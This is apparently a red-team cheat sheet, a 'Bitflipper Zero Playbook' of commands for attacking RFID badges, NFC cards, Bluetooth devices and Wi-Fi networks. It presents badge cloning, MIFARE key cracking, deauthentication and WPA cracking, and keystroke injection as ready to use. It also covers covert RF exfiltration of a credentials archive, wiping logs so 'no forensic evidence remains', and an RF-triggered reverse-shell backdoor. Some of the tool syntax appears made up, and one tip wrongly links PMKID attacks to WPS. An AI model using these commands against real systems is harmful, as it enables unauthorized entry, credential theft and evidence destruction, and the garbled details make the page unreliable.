aex.red

Bitflipper Zero Playbook

RFID Attacks

Clone & Emulate RFID Badges

Tools: Proxmark3, Bitflipper Zero, RFIDler

# Use Proxmark3 to read a 125kHz LF tag
proxmark3 /dev/ttyUSB0 -c "lf hid read"

# Save the dump and replay it
proxmark3 /dev/ttyUSB0 -c "lf hid sim -r <dump>"

# Write to a blank RFID tag
proxmark3 /dev/ttyUSB0 -c "lf hid clone -r <dump> -w"

  • Works on HID Prox and EM4100 tags.

  • Can be modified to work with 13.56MHz smart cards.

Sniff & Replay RFID

# Capture an RFID handshake using Bitflipper Zero
bitflipper-cli rfid-sniff --freq 13.56MHz --log rfid_log.txt

# Replay the captured handshake
bitflipper-cli rfid-replay --input rfid_log.txt

  • Works on MIFARE Classic with weak key encryption.

  • Modify replay delay to bypass simple anti-replay mechanisms.

NFC Attacks

Capture & Modify NFC Data

Tools: LibNFC, MFCUK, MFOC

# Scan for NFC tags
nfc-list

# Dump a MIFARE Classic card (if default keys work)
nfc-mfclassic r a dump.mfd

# Crack MIFARE keys using MFCUK
mfcuk -C -R 0 -s 250 -S 250 -v -O keys.txt

  • Exploits vulnerabilities in MIFARE Classic cards.

  • Once cracked, use nfc-mfclassic w to write back modified data.

Bluetooth Attacks

Discover & Exploit Devices

Tools: Hcitool, L2ping, Bettercap

# Scan for Bluetooth devices
hcitool scan

# Discover services on a target device
sdptool browse <MAC>

# Ping a Bluetooth device to check if it’s active
l2ping -c 1 <MAC>

# Force a pairing attempt
bluetoothctl pair <MAC>

  • Identify default PIN/authentication weaknesses.

  • Use Bettercap for advanced Bluetooth sniffing.

Inject Keystrokes Over Bluetooth

Tools: HIDAttack

# Use HIDAttack to inject keystrokes
hidattack -d <MAC> -s "echo 'hacked' > /tmp/pwned.txt"
  • Targets vulnerable Bluetooth HID devices.

Wi-Fi Attacks

Capture & Decrypt WPA Handshakes

Tools: Aircrack-ng, hcxtools

# Capture WPA handshake
airodump-ng -c <channel> --bssid <router MAC> -w capture wlan0

# Decrypt using a wordlist
aircrack-ng -w rockyou.txt -b <router MAC> capture.cap

  • Use PMKID attacks for networks with WPS enabled.

  • Convert handshake to Hashcat format with hcxpcapngtool.

Deauth Clients to Capture Handshake

# Deauthenticate clients
aireplay-ng --deauth 10 -a <router MAC> -c <client MAC> wlan0
  • Works if AP doesn’t have MFP (Management Frame Protection) enabled.

Data Exfiltration Over RF

Tools: RTL-SDR, Bitflipper Zero

# Transmit data covertly over RF
bitflipper-cli exfil --file creds.zip --freq 433MHz

  • Use frequency hopping to evade detection.

  • Combine with rtl_433 on a receiver to listen for the signal.

Cleanup & Persistence

Wipe Logs & Disable Traces

# Securely wipe device logs
bitflipper-cli wipe --secure

# Remove pairing from Bluetooth history
rm -rf /var/lib/bluetooth/*
  • Ensure no forensic evidence remains.

Maintain Persistence via RF Triggers

# Deploy a backdoor triggered via RF
bitflipper-cli backdoor --trigger 433MHz --payload reverse_shell.sh
  • Keeps access open via radio signal activation.

Graph View